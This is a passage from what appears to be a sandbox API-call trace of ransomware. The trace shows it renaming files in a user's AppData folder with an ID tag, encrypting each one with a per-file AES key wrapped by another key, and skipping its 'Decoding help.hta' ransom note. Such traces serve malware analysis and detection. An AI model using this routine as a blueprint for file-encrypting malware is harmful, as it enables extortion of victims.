HALPmcxz\\AppData\\Roaming\\5_ZUjzjcPnH3.mp4.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_ZUjzjcPnH3.mp4.[ID]g9uZrLhJaygpwRm1[ID]" [0042.663] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_ZUjzjcPnH3.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5_zujzjcpnh3.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_ZUjzjcPnH3.mp4.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5_zujzjcpnh3.mp4.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_ZUjzjcPnH3.mp4.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5_zujzjcpnh3.mp4.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e0 [0042.667] CreateFileMappingA (hFile=0x6e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6e4 [0042.667] CryptAcquireContextA (in: phProv=0x15c1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x15c1fcec*=0x3449248) returned 1 [0046.443] CryptGenKey (in: hProv=0x3449248, Algid=0x6610, dwFlags=0x1, phKey=0x15c1fce8 | out: phKey=0x15c1fce8*=0x6713b0) returned 1 [0046.443] CryptExportKey (in: hKey=0x6713b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x15c1fbe4, pdwDataLen=0x15c1fce4 | out: pbData=0x15c1fbe4*, pdwDataLen=0x15c1fce4*=0x2c) returned 1 [0046.443] MapViewOfFile (hFileMappingObject=0x6e4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9de0) returned 0x2fc0000 [0046.445] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x15c1fbe4*, pdwDataLen=0x15c1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x15c1fbe4*, pdwDataLen=0x15c1fcf8*=0x100) returned 1 [0046.445] CryptEncrypt (in: hKey=0x6713b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fc0000, pdwDataLen=0x15c1fce4*=0x9de0, dwBufLen=0x9de0 | out: pbData=0x2fc0000*, pdwDataLen=0x15c1fce4*=0x9de0) returned 1 [0046.446] UnmapViewOfFile (lpBaseAddress=0x2fc0000) returned 1 [0046.447] CloseHandle (hObject=0x6e4) returned 1 [0046.447] CryptDestroyKey (hKey=0x6713b0) returned 1 [0046.448] CryptReleaseContext (hProv=0x3449248, dwFlags=0x0) returned 1 [0046.448] SetFilePointerEx (in: hFile=0x6e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.448] WriteFile (in: hFile=0x6e0, lpBuffer=0x15c1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x15c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x15c1fbe4*, lpNumberOfBytesWritten=0x15c1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.448] WriteFile (in: hFile=0x6e0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x15c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x15c1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.449] CloseHandle (hObject=0x6e0) returned 1 [0046.451] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_ZUjzjcPnH3.mp4.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.451] FindNextFileW (in: hFindFile=0x671570, lpFindFileData=0x15c1fd30 | out: lpFindFileData=0x15c1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9e367ce0, ftCreationTime.dwHighDateTime=0x1d4c663, ftLastAccessTime.dwLowDateTime=0x27459860, ftLastAccessTime.dwHighDateTime=0x1d4cb58, ftLastWriteTime.dwLowDateTime=0x27459860, ftLastWriteTime.dwHighDateTime=0x1d4cb58, nFileSizeHigh=0x0, nFileSizeLow=0x2d29, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4F4WEY32qCdiSWyG3P.mkv", cAlternateFileName="7E4F4W~1.MKV")) returned 1 [0046.451] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0046.451] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0046.451] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" [0046.451] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\decoding help.hta")) returned 0x1 [0046.451] lstrcmpiW (lpString1="Decoding help.hta", lpString2="7e4F4WEY32qCdiSWyG3P.mkv") returned 1 [0046.451] lstrlenW (lpString="7e4F4WEY32qCdiSWyG3P.mkv") returned 24 [0046.451] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0046.451] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0046.451] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="7e4F4WEY32qCdiSWyG3P.mkv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7e4F4WEY32qCdiSWyG3P.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7e4F4WEY32qCdiSWyG3P.mkv" [0046.451] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7e4F4WEY32qCdiSWyG3P.mkv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7e4F4WEY32qCdiSWyG3P.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7e4F4WEY32qCdiSWyG3P.mkv" [0046.451] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7e4F4WEY32qCdiSWyG3P.mkv", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7e4F4WEY32qCdiSWyG3P.mkv.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7e4F4WEY32qCdiSWyG3P.mkv.[ID]g9uZrLhJaygpwRm1[ID]" [0046.451] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7e4F4WEY32qCdiSWyG3P.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7e4f4wey32qcdiswyg3p.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7e4F4WEY32qCdiSWyG3P.mkv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7e4f4wey32qcdiswyg3p.mkv.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7e4F4WEY32qCdiSWyG3P.mkv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7e4f4wey32qcdiswyg3p.mkv.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e0 [0046.480] CreateFileMappingA (hFile=0x6e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x24c [0046.480] CryptAcquireContextA (in: phProv=0x15c1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x15c1fcec*=0x3448d80) returned 1 [0046.481] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0x15c1fce8 | out: phKey=0x15c1fce8*=0x5a5930) returned 1 [0046.481] CryptExportKey (in: hKey=0x5a5930, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x15c1fbe4, pdwDataLen=0x15c1fce4 | out: pbData=0x15c1fbe4*, pdwDataLen=0x15c1fce4*=0x2c) returned 1 [0046.481] MapViewOfFile (hFileMappingObject=0x24c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2d20) returned 0x530000 [0046.482] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x15c1fbe4*, pdwDataLen=0x15c1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x15c1fbe4*, pdwDataLen=0x15c1fcf8*=0x100) returned 1 [0046.483] CryptEncrypt (in: hKey=0x5a5930, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000*, pdwDataLen=0x15c1fce4*=0x2d20, dwBufLen=0x2d20 | out: pbData=0x530000*, pdwDataLen=0x15c1fce4*=0x2d20) returned 1 [0046.483] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0046.484] CloseHandle (hObject=0x24c) returned 1 [0046.484] CryptDestroyKey (hKey=0x5a5930) returned 1 [0046.484] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0046.484] SetFilePointerEx (in: hFile=0x6e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.484] WriteFile (in: hFile=0x6e0, lpBuffer=0x15c1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x15c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x15c1fbe4*, lpNumberOfBytesWritten=0x15c1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.485] WriteFile (in: hFile=0x6e0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x15c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x15c1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.485] CloseHandle (hObject=0x6e0) returned 1 [0046.486] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7e4F4WEY32qCdiSWyG3P.mkv.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.486] FindNextFileW (in: hFindFile=0x671570, lpFindFileData=0x15c1fd30 | out: lpFindFileData=0x15c1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x894a85c0, ftCreationTime.dwHighDateTime=0x1d4d3b9, ftLastAccessTime.dwLowDateTime=0x6fa55320, ftLastAccessTime.dwHighDateTime=0x1d4c833, ftLastWriteTime.dwLowDateTime=0x6fa55320, ftLastWriteTime.dwHighDateTime=0x1d4c833, nFileSizeHigh=0x0, nFileSizeLow=0x788e, dwReserved0=0x0, dwReserved1=0x0, cFileName="9lk rzIJKnabURE1.png", cAlternateFileName="9LKRZI~1.PNG")) returned 1 [0046.487] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0046.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0046.487] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" [0046.487] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\decoding help.hta")) returned 0x1 [0046.487] lstrcmpiW (lpString1="Decoding help.hta", lpString2="9lk rzIJKnabURE1.png") returned 1 [0046.487] lstrlenW (lpString="9lk rzIJKnabURE1.png") returned 20 [0046.487] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0046.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0046.487] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="9lk rzIJKnabURE1.png" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9lk rzIJKnabURE1.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9lk rzIJKnabURE1.png" [0046.487] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9lk rzIJKnabURE1.png" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9lk rzIJKnabURE1.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9lk rzIJKnabURE1.png" [0046.487] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9lk rzIJKnabURE1.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9lk rzIJKnabURE1.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9lk rzIJKnabURE1.png.[ID]g9uZrLhJaygpwRm1[ID]" [0046.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9lk rzIJKnabURE1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9lk rzijknabure1.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9lk rzIJKnabURE1.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9lk rzijknabure1.png.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9lk rzIJKnabURE1.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9lk rzijknabure1.png.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e0 [0046.488] CreateFileMappingA (hFile=0x6e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x24c [0046.488] CryptAcquireContextA (in: phProv=0x15c1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x15c1fcec*=0x3448d80) returned 1 [0046.489] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0x15c1fce8 | out: phKey=0x15c1fce8*=0x5a5a70) returned 1 [0046.489] CryptExportKey (in: hKey=0x5a5a70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x15c1fbe4, pdwDataLen=0x15c1fce4 | out: pbData=0x15c1fbe4*, pdwDataLen=0x15c1fce4*=0x2c) returned 1 [0046.489] MapViewOfFile (hFileMappingObject=0x24c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7880) returned 0x530000 [0046.490] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x15c1fbe4*, pdwDataLen=0x15c1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x15c1fbe4*, pdwDataLen=0x15c1fcf8*=0x100) returned 1 [0046.491] CryptEncrypt (in: hKey=0x5a5a70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000*, pdwDataLen=0x15c1fce4*=0x7880, dwBufLen=0x7880 | out: pbData=0x530000*, pdwDataLen=0x15c1fce4*=0x7880) returned 1 [0046.491] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0046.493] CloseHandle (hObject=0x24c) returned 1 [0046.493] CryptDestroyKey (hKey=0x5a5a70) returned 1 [0046.493] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0046.493] SetFilePointerEx (in: hFile=0x6e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.493] WriteFile (in: hFile=0x6e0, lpBuffer=0x15c1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x15c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x15c1fbe4*, lpNumberOfBytesWritten=0x15c1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.494] WriteFile (in: hFile=0x6e0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x15c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x15c1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.494] CloseHandle (hObject=0x6e0) returned 1 [0046.496] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9lk rzIJKnabURE1.png.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.496] FindNextFileW (in: hFindFile=0x671570, lpFindFileData=0x15c1fd30 | out: lpFindFileData=0x15c1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58e473f0, ftCreationTime.dwHighDateTime=0x1d4ce41, ftLastAccessTime.dwLowDateTime=0x5901e1c0, ftLastAccessTime.dwHighDateTime=0x1d4d188, ftLastWriteTime.dwLowDateTime=0x5901e1c0, ftLastWriteTime.dwHighDateTime=0x1d4d188, nFileSizeHigh=0x0, nFileSizeLow=0x11643, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdARbZbRdZlVmzpJhU8h.mkv", cAlternateFileName="ADARBZ~1.MKV")) returned 1 [0046.496] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0046.496] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0046.496] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" [0046.496] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\decoding help.hta")) returned 0x1 [0046.496] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AdARbZbRdZlVmzpJhU8h.mkv") returned 1 [0046.496] lstrlenW (lpString="AdARbZbRdZlVmzpJhU8h.mkv") returned 24 [0046.496] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0046.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0046.497] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="AdARbZbRdZlVmzpJhU8h.mkv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AdARbZbRdZlVmzpJhU8h.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AdARbZbRdZlVmzpJhU8h.mkv" [0046.497] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AdARbZbRdZlVmzpJhU8h.mkv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AdARbZbRdZlVmzpJhU8h.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AdARbZbRdZlVmzpJhU8h.mkv" [0046.497] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AdARbZbRdZlVmzpJhU8h.mkv", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AdARbZbRdZlVmzpJhU8h.mkv.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AdARbZbRdZlVmzpJhU8h.mkv.[ID]g9uZrLhJaygpwRm1[ID]" [0046.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AdARbZbRdZlVmzpJhU8h.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adarbzbrdzlvmzpjhu8h.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AdARbZbRdZlVmzpJhU8h.mkv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adarbzbrdzlvmzpjhu8h.mkv.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AdARbZbRdZlVmzpJhU8h.mkv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adarbzbrdzlvmzpjhu8h.mkv.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e0 [0046.497] CreateFileMappingA (hFile=0x6e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x24c [0046.498] CryptAcquireContextA (in: phProv=0x15c1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x15c1fcec*=0x3448d80) returned 1 [0046.498] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0x15c1fce8 | out: phKey=0x15c1fce8*=0x5a5930) returned 1 [0046.498] CryptExportKey (in: hKey=0x5a5930, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x15c1fbe4, pdwDataLen=0x15c1fce4 | out: pbData=0x15c1fbe4*, pdwDataLen=0x15c1fce4*=0x2c) returned 1 [0046.498] MapViewOfFile (hFileMappingObject=0x24c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11640) returned 0x3210000 [0046.500] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x15c1fbe4*, pdwDataLen=0x15c1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x15c1fbe4*, pdwDataLen=0x15c1fcf8*=0x100) returned 1 [0046.500] CryptEncrypt (in: hKey=0x5a5930, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3210000, pdwDataLen=0x15c1fce4*=0x11640, dwBufLen=0x11640 | out: pbData=0x3210000*, pdwDataLen=0x15c1fce4*=0x11640) returned 1 [0046.501] UnmapViewOfFile (lpBaseAddress=0x3210000) returned 1 [0046.503] CloseHandle (hObject=0x24c) returned 1 [0046.503] CryptDestroyKey (hKey=0x5a5930) returned 1 [0046.503] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0046.503] SetFilePointerEx (in: hFile=0x6e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.503] WriteFile (in: hFile=0x6e0, lpBuffer=0x15c1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x15c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x15c1fbe4*, lpNumberOfBytesWritten=0x15c1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.504] WriteFile (in: hFile=0x6e0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x15c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x15c1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.504] CloseHandle (hObject=0x6e0) returned 1 [0046.505] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AdARbZbRdZlVmzpJhU8h.mkv.[ID]g9uZrLhJaygpwRm1[ID]", 